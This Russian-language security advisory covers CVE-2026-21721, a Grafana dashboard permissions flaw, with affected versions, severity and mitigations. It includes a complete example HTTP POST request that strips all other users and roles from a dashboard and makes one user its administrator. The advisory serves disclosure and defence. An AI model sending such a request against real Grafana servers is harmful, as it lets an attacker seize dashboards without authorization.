Почему у моего дашборда новый админ ? CVE-2026-21721 — уязвимость небезопасного управления привилегиями в дашбордах Grafana. Исправления: >=12.3.0 <12.3.1+security-01 >=12.2.0 <12.2.3+security-01 >=12.1.0 <12.1.5+security-01 >=12.0.0 <12.0.8+security-01 >=10.2.0 <11.6.9+security-01 😬 Метрики Base Score: 8.1 HIGH CWE: CWE-269 BDU:2026-01120 😬 Об уязвимости API отвечает за изменение разрешений дашбордов Grafana. И он не проверяет корректный контекст целевой панели — он лишь смотрит, есть ли у пользователя базовое право на управление разрешениями. В результате если у пользователя есть право управлять разрешениями хотя бы одном дашборде, то он может изменить разрешения других дашбордов, к которым вообще не должен иметь доступ. Уязвимая конечная точка: /api/dashboards/uid/<uid>/permissions Для примера можно отправить такой запрос: POST /api/dashboards/uid/bfc7vbecejl6oc/permissions HTTP/1.1 Host: 192.168.177.165:3000 User-Agent: python-requests/2.28.1 Accept-Encoding: gzip, deflate, br Accept: / Connection: keep-alive Cookie: grafana_session=9bbdffb57037d16704c7a299470b6ba4; grafana_session_expiry=1770202645 Content-Length: 44 Content-Type: application/json {"items": [ {"userId": 2, "permission": 4}]} Этот запрос удалит все доступные роли и всех пользователей, кроме пользователя userId: 2. Для него запрос установит права администратора в дашборде с uid: bfc7vbecejl6oc 😬 Как защититься 1) Обновиться. 2) Провести мониторинг прав пользователей в созданных дашбордах. 3) Если быстро обновиться невозможно, то лучше временно ограничить доступ к API /api/dashboards/uid/<uid>/permissions для POST-запросов. Для этого используйте правила WAF/IDS.